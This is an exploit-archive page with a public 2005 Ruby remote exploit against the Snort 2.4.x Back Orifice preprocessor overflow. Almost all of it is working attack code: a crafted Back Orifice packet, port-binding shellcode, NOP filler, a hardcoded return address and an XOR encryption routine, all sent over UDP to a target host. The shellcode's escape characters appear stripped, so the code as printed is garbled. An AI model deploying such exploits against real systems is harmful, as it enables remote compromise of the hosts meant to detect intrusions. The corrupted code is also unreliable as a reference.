Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (4)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (4)
# Published : 2005-11-11
# Author : xwings
# Previous Title : Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (3)
# Next Title : linux-ftpd-ssl 0.17 (MKD/CWD) Remote Root Exploit

#!/usr/bin/ruby -w

#
#
# Version 0.1 (Public)
#
# snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit
#
# by xwings at mysec dot org
# URL : http://www.mysec.org , somebody need to update the page
# 
# Saying Hi to ....
#
# . All the 1337 c0d3r @ pulltheplug.org
# . Gurus from #rubylang @ freenode.net
# . Skywizard @ somewhere right now
# . HITBSecConf CREW and Team Panda
# 
# 03:07 <@mark> hey xwings
# 03:07 <@mark> why don't you come up and see me sometime?
#
# Tested on :
# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
# gcc version 3.3.5 (Debian 1:3.3.5-13)
# Snort 2.4.2 , ./configure && make && make install
#
# Use Ruby : http://www.ruby-lang.org
# 
# 
#

require 'socket'

fathost         = ARGV[0]
packetsize      = 1069 # ret is 1069
targetport      = 9080

boheader =      "*!*QWTY?"  +
                [1096].pack("V")  +           # Length ,thanx Russell Sanford
                "xedxacxefx0d"+           # ID
                "x01"                        # PING

## Port Bind 3964 . connectback, refer to Russell Sanford's code

shellcode =     "x31xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13xe8"+
                "x8ex30x01x83xebxfcxe2xf4xd9x55x63x42xbbxe4x32x6b"+
                "x8exd6xa9x88x09x43xb0x97xabxdcx56x69xe7xf2x56x52"+
                "x61x6fx5ax67xb0xdex61x57x61x6fxfdx81x58xe8xe1xe2"+
                "x25x0ex62x53xbexcdxb9xe0x58xe8xfdx81x7bxe4x32x58"+
                "x58xb1xfdx81xa1xf7xc9xb1xe3xdcx58x2exc7xfdx58x69"+
                "xc7xecx59x6fx61x6dx62x52x61x6fxfdx81"

filler =        "x90" * (packetsize-(boheader.length + shellcode.length))

retadd =        [0xbffff370].pack('L')

        
darthcode = (shellcode+filler+retadd)

def msrand(seed)
        @holdrand = 31337 
        end

def mrand()
        return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff)
        end

def bocrypt(takepayload)

        @arrpayload = (takepayload.split(//))
       
        encpayload ="".to_s
        @holdrand=0
        msrand(0)
        
        @arrpayload.each do |c|
                encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr
                end
        
        return encpayload
        end

UDPSocket.open.send(bocrypt(boheader+darthcode), 0, fathost, targetport)

# www.Syue.com [2005-11-11]